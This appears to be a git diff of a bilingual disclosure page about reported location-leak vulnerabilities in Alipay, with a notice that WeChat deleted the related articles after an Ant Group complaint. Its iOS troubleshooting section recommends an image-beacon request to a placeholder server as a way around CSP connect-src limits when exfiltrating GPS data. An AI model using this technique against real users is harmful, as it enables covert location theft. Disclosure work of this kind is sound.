- 📢 官方声明 & 微信公众号文章
- 📢 Official Statement & WeChat Articles
+
+
+
+
+ 🚨 审查通知:微信公众号文章已被全部强制删除
+ 🚨 CENSORSHIP NOTICE: All WeChat Articles Forcibly Deleted
-
-
- ⚠️ 重要声明:本研究的所有后续更新仅通过以下两个官方渠道发布:
- 1️⃣ 本页面(https://innora.ai/zfb/)
- 2️⃣ 微信公众号 AI-security-innora
- 其他任何渠道发布的内容均非本团队授权,请勿轻信。
+
+
+ 2026-03-15 — 我们在微信公众号 AI-security-innora 发布的 4 篇安全研究文章全部被强制删除。
+ 删除理由:"违反《中华人民共和国网络安全法》"(接相关投诉)。
+ 投诉方:北京格韵律师事务所(代理厂商蚂蚁集团)。
+ 这是厂商应对安全研究的第四层手段:
+ ① 口头否认(3/10 "正常功能")→ ② 律师函(3/11 发布4小时后)→ ③ 服务器端封堵 PoC(3/15 白名单拦截)→ ④ 平台审查删除所有文章(3/15)
+ 本页面 (innora.ai/zfb/) 部署在中国境外服务器,不受微信平台审查影响。研究内容完整保留。
-
- ⚠️ Important: All future updates to this research are published exclusively through two official channels:
- 1️⃣ This page (https://innora.ai/zfb/)
- 2️⃣ WeChat Official Account: AI-security-innora
- Content from any other source is not authorized by our team.
+
+ 2026-03-15 — All 4 security research articles published on our WeChat Official Account AI-security-innora have been forcibly deleted.
+ Reason given: "Violation of the Cybersecurity Law of the People's Republic of China" (following a complaint).
+ Complainant: Beijing Geyun Law Firm (representing Ant Group).
+ This represents the vendor's fourth layer of response to security research:
+ ① Verbal denial (3/10 "normal functionality") → ② Lawyer's letter (3/11, 4hrs after disclosure) → ③ Server-side PoC blocking (3/15, whitelist filtering) → ④ Platform censorship of all articles (3/15)
+ This page (innora.ai/zfb/) is hosted outside mainland China and is not subject to WeChat censorship. All research content is preserved here.
-
-
-
- NEW
-
- 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查
- When Whitelist Bypass Becomes the Master Key — Arrogance Ends at the Courtroom
-
+
+
+ 被删除的 4 篇文章:
+ 4 Deleted Articles:
+
+
+
+ DELETED
+ 当白名单绕过沦为全网攻击的钥匙,傲慢的终点是法庭与溯源调查When Whitelist Bypass Becomes the Master Key
-
- Vol.19 — 全球160个监管机构通报 + 白名单绕过完整技术分析
- Vol.19 — Global regulatory notification to 160 agencies + complete whitelist bypass analysis
+
+ DELETED
+ 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决Tech Giant's "Gag Order" Rejected by WeChat
-
-
-
- HOT
-
- 巨头的"封口令"被微信驳回,全球顶级黑客弹药库给出最终裁决
- Tech Giant's "Gag Order" Rejected by WeChat, Packet Storm Delivers Final Verdict
-
+
+ DELETED
+ 位置被秒偷!10多亿人每天在用的国民支付应用,17个「正常功能」细思极恐!Location Stolen Instantly! 17 "Normal Features"
-
- Vol.15 — 微信投诉驳回 + Packet Storm Security 收录 (ID 217089)
- Vol.15 — WeChat complaint dismissed + Packet Storm published (ID 217089)
+
+ DELETED
+ 支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"?Alipay Research Hit with Lawyer's Letter
-
-
-
- LEGAL
-
- 支付宝安全研究遭律师函投诉 — 一篇零次提及"支付宝"的文章如何构成"商誉侵权"?
- Alipay Research Hit with Lawyer's Letter — How Does Zero Mentions Constitute "Reputation Infringement"?
-
-
-
- 完整法律申诉 — 逐条回应投诉方三项"不实信息"主张
- Full legal defense — point-by-point rebuttal of all three "false information" claims
-
-
-
-
- ORIGINAL
-
- 位置被秒偷!10多亿人每天在用的国民支付应用,17个「正常功能」细思极恐!
- Location Stolen Instantly! 17 "Normal Features" in a Payment App Used by 1B+ People
-
-
-
- 原始技术分析 — 17个漏洞 + 308条日志 + 42张截图 + 3台设备跨3国验证
- Original analysis — 17 issues + 308 logs + 42 screenshots + 3 devices across 3 countries
-
-
+
+
+
+
+ 
+ 微信平台删除通知 (1/2)WeChat deletion notice (1/2)
+
+
+ 
+ 微信平台删除通知 (2/2)WeChat deletion notice (2/2)
+
@@ -2392,10 +2377,12 @@ Language/zh-Hant Region/CN
freshnn 报告 iOS 可以调用并打开相关页面,但服务端收不到数据;Android 上「无感 GPS」则复现成功。
可能原因:
- - 域名/HTTPS 配置 — iOS WKWebView 对混合内容和 CORS 策略更严格,PoC 服务器需使用有效 HTTPS 证书且设置正确的 CORS 头
+ - HTTPS 混合内容阻止 — 如果 PoC 页面在 HTTPS 的支付宝 WebView 中加载,而数据外传目标是 HTTP,WKWebView 会直接阻止请求发出(注意:这会阻止 request 本身,不只是 response)
+ - CSP connect-src 限制 — 支付宝 WebView 可能设置了 CSP 的
connect-src 指令,阻止向外部域发送请求
+ - 解决方案 — 使用 Image beacon(
new Image().src = "https://server/log?data=...")属于 simple request 且不受 connect-src 限制
- 支付宝版本差异 — 不同版本的 JSBridge 鉴权策略可能不同,建议使用最新版测试
- - CSP(内容安全策略) — iOS 上可能有更严格的 CSP 头限制外部请求
+ 技术修正:感谢 meooxx 指出 CORS 是浏览器端策略——它阻止的是浏览器读取 response,不阻止 request 到达服务器。对于 simple request,服务器一定会收到请求。
关键事实:我们的 iPhone 16 Pro (iOS 18.3) 测试确实成功获取了 GPS 数据(记录在服务器日志中),蚂蚁集团安全负责人的 iPhone 在杭州的测试也被我们成功获取了坐标。iOS 复现需要满足特定的服务器配置条件,并非漏洞不存在。
我们将在 Issue #5 中提供详细的 iOS 复现排查指南。
@@ -2404,10 +2391,12 @@ Language/zh-Hant Region/CN
freshnn reported that iOS can invoke and open the relevant pages, but the server receives no data; Android "silent GPS" was successfully reproduced.
Possible causes:
- - Domain/HTTPS configuration — iOS WKWebView enforces stricter mixed content and CORS policies; PoC server needs valid HTTPS certificate with correct CORS headers
+ - HTTPS mixed content blocking — If the PoC page loads in Alipay's HTTPS WebView but the exfiltration target is HTTP, WKWebView will block the request entirely (this blocks the request itself, not just the response)
+ - CSP connect-src restriction — Alipay's WebView may set CSP
connect-src directives that block requests to external domains
+ - Solution — Use Image beacon (
new Image().src = "https://server/log?data=...") which is a simple request not restricted by connect-src
- Alipay version differences — Different versions may have different JSBridge authentication policies; test with the latest version
- - CSP (Content Security Policy) — Stricter CSP headers on iOS may restrict external requests
+ Technical correction: Thanks to meooxx for pointing out that CORS is a browser-side policy — it blocks the browser from reading the response, not the request from reaching the server. For simple requests, the server always receives the request.
Key fact: Our iPhone 16 Pro (iOS 18.3) test did successfully obtain GPS data (recorded in server logs). Ant Group's security lead's iPhone in Hangzhou was also successfully captured. iOS reproduction requires specific server configuration — the vulnerability exists, but the PoC setup matters.
We will provide a detailed iOS reproduction troubleshooting guide in Issue #5.
diff --git a/wechat_censored_1.jpeg b/wechat_censored_1.jpeg
new file mode 100644
index 0000000..582d18a
Binary files /dev/null and b/wechat_censored_1.jpeg differ
diff --git a/wechat_censored_2.jpeg b/wechat_censored_2.jpeg
new file mode 100644
index 0000000..b9d84ca
Binary files /dev/null and b/wechat_censored_2.jpeg differ
+ 🚨 审查通知:微信公众号文章已被全部强制删除 + 🚨 CENSORSHIP NOTICE: All WeChat Articles Forcibly Deleted
-- 1️⃣ 本页面(
https://innora.ai/zfb/)- 2️⃣ 微信公众号 AI-security-innora
- 其他任何渠道发布的内容均非本团队授权,请勿轻信。 +
+ 删除理由:"违反《中华人民共和国网络安全法》"(接相关投诉)。
+ 投诉方:北京格韵律师事务所(代理厂商蚂蚁集团)。
+ 这是厂商应对安全研究的第四层手段:
+ ① 口头否认(3/10 "正常功能")→ ② 律师函(3/11 发布4小时后)→ ③ 服务器端封堵 PoC(3/15 白名单拦截)→ ④ 平台审查删除所有文章(3/15)
+ 本页面 (innora.ai/zfb/) 部署在中国境外服务器,不受微信平台审查影响。研究内容完整保留。 - - ⚠️ Important: All future updates to this research are published exclusively through two official channels:
- 1️⃣ This page (
https://innora.ai/zfb/)- 2️⃣ WeChat Official Account: AI-security-innora
- Content from any other source is not authorized by our team. + + 2026-03-15 — All 4 security research articles published on our WeChat Official Account AI-security-innora have been forcibly deleted.
+ Reason given: "Violation of the Cybersecurity Law of the People's Republic of China" (following a complaint).
+ Complainant: Beijing Geyun Law Firm (representing Ant Group).
+ This represents the vendor's fourth layer of response to security research:
+ ① Verbal denial (3/10 "normal functionality") → ② Lawyer's letter (3/11, 4hrs after disclosure) → ③ Server-side PoC blocking (3/15, whitelist filtering) → ④ Platform censorship of all articles (3/15)
+ This page (innora.ai/zfb/) is hosted outside mainland China and is not subject to WeChat censorship. All research content is preserved here.
+ 被删除的 4 篇文章: + 4 Deleted Articles: +
+
+ 微信平台删除通知 (1/2)WeChat deletion notice (1/2)
+
+ 微信平台删除通知 (2/2)WeChat deletion notice (2/2)
+freshnn 报告 iOS 可以调用并打开相关页面,但服务端收不到数据;Android 上「无感 GPS」则复现成功。
可能原因:
-
-
- 域名/HTTPS 配置 — iOS WKWebView 对混合内容和 CORS 策略更严格,PoC 服务器需使用有效 HTTPS 证书且设置正确的 CORS 头 +
- HTTPS 混合内容阻止 — 如果 PoC 页面在 HTTPS 的支付宝 WebView 中加载,而数据外传目标是 HTTP,WKWebView 会直接阻止请求发出(注意:这会阻止 request 本身,不只是 response) +
- CSP connect-src 限制 — 支付宝 WebView 可能设置了 CSP 的
connect-src指令,阻止向外部域发送请求
+ - 解决方案 — 使用 Image beacon(
new Image().src = "https://server/log?data=...")属于 simple request 且不受connect-src限制 - 支付宝版本差异 — 不同版本的 JSBridge 鉴权策略可能不同,建议使用最新版测试 -
- CSP(内容安全策略) — iOS 上可能有更严格的 CSP 头限制外部请求
技术修正:感谢 meooxx 指出 CORS 是浏览器端策略——它阻止的是浏览器读取 response,不阻止 request 到达服务器。对于 simple request,服务器一定会收到请求。
关键事实:我们的 iPhone 16 Pro (iOS 18.3) 测试确实成功获取了 GPS 数据(记录在服务器日志中),蚂蚁集团安全负责人的 iPhone 在杭州的测试也被我们成功获取了坐标。iOS 复现需要满足特定的服务器配置条件,并非漏洞不存在。
我们将在 Issue #5 中提供详细的 iOS 复现排查指南。
freshnn reported that iOS can invoke and open the relevant pages, but the server receives no data; Android "silent GPS" was successfully reproduced.
Possible causes:
-
-
- Domain/HTTPS configuration — iOS WKWebView enforces stricter mixed content and CORS policies; PoC server needs valid HTTPS certificate with correct CORS headers +
- HTTPS mixed content blocking — If the PoC page loads in Alipay's HTTPS WebView but the exfiltration target is HTTP, WKWebView will block the request entirely (this blocks the request itself, not just the response) +
- CSP connect-src restriction — Alipay's WebView may set CSP
connect-srcdirectives that block requests to external domains
+ - Solution — Use Image beacon (
new Image().src = "https://server/log?data=...") which is a simple request not restricted byconnect-src - Alipay version differences — Different versions may have different JSBridge authentication policies; test with the latest version -
- CSP (Content Security Policy) — Stricter CSP headers on iOS may restrict external requests
Technical correction: Thanks to meooxx for pointing out that CORS is a browser-side policy — it blocks the browser from reading the response, not the request from reaching the server. For simple requests, the server always receives the request.
Key fact: Our iPhone 16 Pro (iOS 18.3) test did successfully obtain GPS data (recorded in server logs). Ant Group's security lead's iPhone in Hangzhou was also successfully captured. iOS reproduction requires specific server configuration — the vulnerability exists, but the PoC setup matters.
We will provide a detailed iOS reproduction troubleshooting guide in Issue #5.